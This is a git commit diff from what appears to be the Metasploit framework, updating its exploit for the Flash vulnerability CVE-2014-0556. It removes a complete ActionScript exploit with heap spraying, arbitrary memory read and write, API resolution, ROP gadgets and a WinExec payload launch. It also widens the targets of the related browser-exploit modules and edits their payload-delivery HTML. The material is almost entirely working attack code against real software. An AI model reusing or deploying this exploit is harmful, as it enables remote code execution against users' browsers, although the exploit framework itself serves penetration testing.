Update CVE-2014-0556

2015-06-04 18:23:50 -05:00 · 2015-06-04 18:23:50 -05:00 · 02181addc5
parent 23df66bf3a
commit 02181addc5
5 changed files with 14 additions and 196 deletions
--- a/data/exploits/CVE-2014-0556/msf.swf
+++ b/data/exploits/CVE-2014-0556/msf.swf
--- a/external/source/exploits/CVE-2014-0556/Main.as
+++ b/external/source/exploits/CVE-2014-0556/Main.as
@ -1,185 +0,0 @@
-// Build how to:
-// 1. Download the AIRSDK, and use its compiler.
-// 2. Download the Flex SDK (4.6)
-// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
-//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
-// 4. Build with: mxmlc -o msf.swf Main.as
-
-// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/
-// Modified to be used from msf
-
-package
-{
-	import flash.display.Sprite
-	import flash.display.BitmapData
-	import flash.geom.Rectangle
-	import flash.utils.ByteArray
-	import flash.display.LoaderInfo
-	import mx.utils.Base64Decoder
-
-	public class Main extends Sprite 
-	{
-		private var bv:Vector.<ByteArray> = new Vector.<ByteArray>(12800)
-		private var uv:Vector.<Object> = new Vector.<Object>(12800)
-		private var bd:BitmapData = new BitmapData(128, 16)
-		private var i:uint = 0
-
-		public function Main() 
-		{
-			var b64:Base64Decoder = new Base64Decoder()
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			var payload:String = b64.toByteArray().toString()
-			
-			for (i = 0; i < bv.length; i++) {
-				bv[i] = new ByteArray()
-				bv[i].length = 0x2000
-				bv[i].position = 0xFFFFF000
-			}
-
-			for (i = 0; i < bv.length; i++)
-				if (i % 2 == 0) bv[i] = null
-
-			for (i = 0; i < uv.length; i++) {
-				uv[i] = new Vector.<uint>(1022)
-			}
-			
-			bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401])
-			
-			for (i = 0; ; i++)
-				if (uv[i].length == 0xffffffff) break
-			
-			for (var i2:uint = 1; i2 < uv.length; i2++) {
-				if (i == i2) continue
-				uv[i2] = new Vector.<Object>(1014)
-				uv[i2][0] = bv[6401]
-				uv[i2][1] = this
-			}
-			
-			uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000
-			bv[6401].endian = "littleEndian"
-			bv[6401].length = 0x500000
-			var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000
-			var main:uint = uv[i][0xfffffc09] - 1
-			var vtable:uint = vector_read(main)
-			vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8)
-			vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff)
-			byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8))
-			byte_write(uv[i][0])
-			
-			var flash:uint = base(vtable)
-			var winmm:uint = module("winmm.dll", flash)
-			var kernel32:uint = module("kernel32.dll", winmm)
-			var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-			var winexec:uint = procedure("WinExec", kernel32)
-			var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-			var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-
-			byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-			byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-			byte_write(0, "\x89\x03", false) // mov [ebx], eax
-			byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-			byte_write(buffer + 0x100, payload, true)
-			byte_write(buffer + 0x20070, xchgeaxespret)
-			byte_write(buffer + 0x20000, xchgeaxesiret)
-			byte_write(0, virtualprotect)
-
-			// VirtualProtect
-			byte_write(0, winexec)
-			byte_write(0, buffer + 0x30000)
-			byte_write(0, 0x1000)
-			byte_write(0, 0x40)
-			byte_write(0, buffer + 0x80)
-
-			// WinExec
-			byte_write(0, buffer + 0x30000)
-			byte_write(0, buffer + 0x100)
-			byte_write(0)
-
-			byte_write(main, buffer + 0x20000)
-			this.toString()
-		}
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			return addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1]
-		}
-		
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) bv[6401].position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i))
-				if (zero) bv[6401].writeByte(0)
-			} else bv[6401].writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			bv[6401].position = addr
-			switch(type) {
-				case "dword":
-					return bv[6401].readUnsignedInt()
-				case "word":
-					return bv[6401].readUnsignedShort()
-				case "byte":
-					return bv[6401].readUnsignedByte()
-			}
-			return 0
-		}
-		
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				bv[6401].position = addr + entry
-				if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				bv[6401].position = addr + entry
-				if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}
-	}
-}
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@ -6,7 +6,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@ -6,7 +6,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

--- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
+++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
@ -6,9 +6,8 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking

-  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
@ -47,9 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=  Gem::Version.new('14.0.0.176') },
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=  Gem::Version.new('14.0.0.179') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
@ -82,17 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>